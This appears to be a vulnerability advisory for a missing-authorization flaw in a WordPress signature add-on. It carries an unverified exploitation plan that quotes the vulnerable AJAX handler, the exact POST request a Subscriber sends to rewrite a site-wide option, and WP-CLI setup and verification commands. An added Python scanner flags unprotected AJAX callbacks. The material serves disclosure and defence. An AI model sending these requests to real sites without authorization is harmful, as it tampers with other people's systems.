CVE-2026-24985

WP Forms Signature Contract Add-On <= 1.8.2 - Missing Authorization to Authenticated (Subscriber+) Notice Dismissal

Severity: medium
Type: Missing Authorization
CVSS Score: 4.3
Patched in: 1.8.3
Time to patch: 23 days

Description

The WP Forms Signature Contract Add-On plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to dismiss notices.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.8.2
Published: January 19, 2026
Last updated: February 10, 2026

What Changed in the Fix

Changes introduced in v1.8.3


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-24985

1. Vulnerability Summary

CVE-2026-24985 is a Missing Authorization vulnerability, with no Cross-Site Request Forgery (CSRF) protection either, in the WP Forms Signature Contract Add-On plugin (versions <= 1.8.2). Specifically, the AJAX handler that permanently dismisses the plugin's rating widget notice performs no capability check (current_user_can) and no nonce verification. Any authenticated user, including one with Subscriber-level permissions, can therefore set a site-wide plugin option and dismiss a notice intended for administrators.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: esig_wpform_ratting_widget_remove
  • Method: POST
  • Parameters: action=esig_wpform_ratting_widget_remove
  • Authentication: Required (Subscriber or higher).
  • Preconditions: The plugin must be active. The vulnerability is triggered by a lack of access control in the AJAX callback.

3. Code Flow

  1. Registration: In admin/rating-widget/esign-rating-widget.php, the class esignRatingWidgetWpForm registers the AJAX action in its __construct() method (lines 53-54):
    add_action('wp_ajax_esig_wpform_ratting_widget_remove', array($this, 'esigWpformRattingWidgetRemove'));
    
    The hook is registered under the wp_ajax_ prefix, which fires for every logged-in user regardless of role; only a wp_ajax_nopriv_ registration would also expose it to unauthenticated requests.
  2. Trigger: The attacker sends an HTTP POST request to admin-ajax.php with the action parameter set to esig_wpform_ratting_widget_remove.
  3. Execution: WordPress routes the request to the esigWpformRattingWidgetRemove method in admin/rating-widget/esign-rating-widget.php:
    public function esigWpformRattingWidgetRemove() {
        // No check_ajax_referer()/wp_verify_nonce() and no current_user_can()
        // precede the write, so any authenticated request reaches it.
        update_option('remove_rating_widget_wpform','Yes');
        die();
    }
    
  4. Sink: update_option() (line 58) writes the site-wide remove_rating_widget_wpform option to the wp_options table. No capability check or nonce validation occurs before this write.

4. Nonce Acquisition Strategy

Based on the source code in admin/rating-widget/esign-rating-widget.php, the function esigWpformRattingWidgetRemove does not verify a nonce.

  • The JS file admin/rating-widget/assets/js/rating-widget-control.js calls esigRemoteRequest("esig_wpform_ratting_widget_remove", "POST", ...), but the receiving PHP method performs neither a nonce check nor a capability check, so whatever the JS side sends is irrelevant to exploitation.
  • Therefore, no nonce is required for this exploit.

5. Exploitation Strategy

The exploit consists of authenticating as a low-privileged user (Subscriber) and sending a single AJAX request that rewrites the site-wide option.

  1. Authenticate: Log in as a Subscriber and keep the session cookies WordPress sets (wordpress_logged_in_*).
  2. Request: Send the following request with that authenticated session:
    • URL: http://[target]/wp-admin/admin-ajax.php
    • Method: POST
    • Headers:
      • Content-Type: application/x-www-form-urlencoded
      • Cookie: the Subscriber's WordPress session cookies (without them admin-ajax.php treats the request as unauthenticated and the wp_ajax_ hook never fires)
    • Body: action=esig_wpform_ratting_widget_remove

6. Test Data Setup

  1. Users:
    • Create an Administrator user (to confirm the notice disappears for administrators too).
    • Create a Subscriber user (the attacker): wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  2. Plugin State: Ensure wp-forms-signature-contract-add-on is active.
  3. Option Verification: Record the option's state before the attack:
    • wp option get remove_rating_widget_wpform should report that the option does not exist, or return any value other than Yes.

7. Expected Results

  • The AJAX request returns HTTP 200 with an empty body: the handler runs update_option() and then die(). An HTTP 400 response with body 0 means WordPress found no handler hooked for the action, i.e. the request was not authenticated or the plugin is inactive.
  • The WordPress option remove_rating_widget_wpform is set to Yes.
  • The rating widget notice no longer appears for any user, including administrators, because esignRatingWidget() in esign-rating-widget.php (line 117) checks this option:
    $checkWidget = get_option('remove_rating_widget_wpform');
    if($checkWidget == "Yes") return false;
    

8. Verification Steps

After sending the request, verify the impact using WP-CLI:

wp option get remove_rating_widget_wpform

Success Criteria: The command returns Yes.

9. Alternative Approaches

Whether or not esigRemoteRequest on the JS side attaches a nonce, only the server-side checks matter, so verify whether other AJAX actions in the plugin are similarly unprotected:

  • Analyze admin/esig-wpform-admin.php for add_action('wp_ajax_esig_wpform_fields', array($this, 'esig_wpform_fields'));.
  • Examine the esig_wpform_fields method (not fully provided in the snippet) to see whether it also lacks a capability check. If it does, an attacker could enumerate WPForms fields.
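A small static check that does the follow-up described in section 9 (and mechanically confirms the code-flow finding in section 3) across a whole plugin: it pairs every wp_ajax_* / wp_ajax_nopriv_* registration with its callback body and reports the callbacks that contain no capability or nonce check. This is an added example, not the plugin's or the page's own code; the PHP it scans is a constructed sample that reproduces the registration and handler quoted in section 3 and adds two hypothetical handlers (esig_example_protected, esig_example_public) purely for contrast. Run it on the real plugin by reading the files under admin/ instead of SAMPLE_PHP.

```python
"""Report wp_ajax_* callbacks with no capability or nonce check.

Added example, not part of this page or the plugin. Regex-based: it handles the
add_action(..., array($this, 'method')) and add_action(..., 'function') forms
and assumes the callback is defined in the same source text; braces inside PHP
string literals would confuse the body extraction.
"""
import re

# Constructed sample: the registration and handler quoted on the page, plus a
# hypothetical hardened handler and a hypothetical nopriv handler (both made up).
SAMPLE_PHP = r"""<?php
class esignRatingWidgetWpForm {
    public function __construct() {
        add_action('wp_ajax_esig_wpform_ratting_widget_remove', array($this, 'esigWpformRattingWidgetRemove'));
        add_action('wp_ajax_esig_example_protected', array($this, 'esigExampleProtected'));
        add_action('wp_ajax_nopriv_esig_example_public', array($this, 'esigExamplePublic'));
    }
    public function esigWpformRattingWidgetRemove() {
        update_option('remove_rating_widget_wpform','Yes');
        die();
    }
    public function esigExampleProtected() {
        check_ajax_referer('esig_example_nonce', 'security');
        if ( ! current_user_can('manage_options') ) {
            wp_send_json_error('forbidden', 403);
        }
        update_option('remove_rating_widget_wpform', 'Yes');
        wp_send_json_success();
    }
    public function esigExamplePublic() {
        echo get_option('blogname');
        die();
    }
}
"""

HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(nopriv_)?(\w+)['"]\s*,\s*"""
    r"""(?:array\(\s*\$this\s*,\s*['"](\w+)['"]\s*\)|['"](\w+)['"])"""
)
# WordPress core functions that implement a capability or nonce check.
CHECKS = ("current_user_can(", "check_ajax_referer(", "wp_verify_nonce(",
          "check_admin_referer(")


def function_body(src, name):
    """Return the brace-delimited body of `function name(...)`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]


def find_unprotected_ajax_handlers(src):
    """Map action name -> {'callback', 'nopriv'} for every registered AJAX
    action whose callback body contains none of CHECKS. nopriv hooks are
    reachable without logging in; wp_ajax_ hooks by any logged-in user."""
    findings = {}
    for m in HOOK_RE.finditer(src):
        nopriv, action, method, func = m.groups()
        callback = method or func
        body = function_body(src, callback)
        if body is None:
            continue  # defined in another file; follow up manually
        if not any(check in body for check in CHECKS):
            findings[action] = {"callback": callback, "nopriv": bool(nopriv)}
    return findings


if __name__ == "__main__":
    for action, info in find_unprotected_ajax_handlers(SAMPLE_PHP).items():
        reach = "unauthenticated" if info["nopriv"] else "any logged-in user"
        print("%s: %s() has no capability/nonce check, reachable by %s"
              % (action, info["callback"], reach))
```

On the sample this flags esig_wpform_ratting_widget_remove (any logged-in user) and the made-up esig_example_public (unauthenticated), and passes esig_example_protected, whose body shows the pattern a fix needs: check_ajax_referer() for CSRF and current_user_can() for authorization, both before the write. A hit from this scan is a lead, not a finding: a callback may delegate its checks to a helper, so read the body before reporting it.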
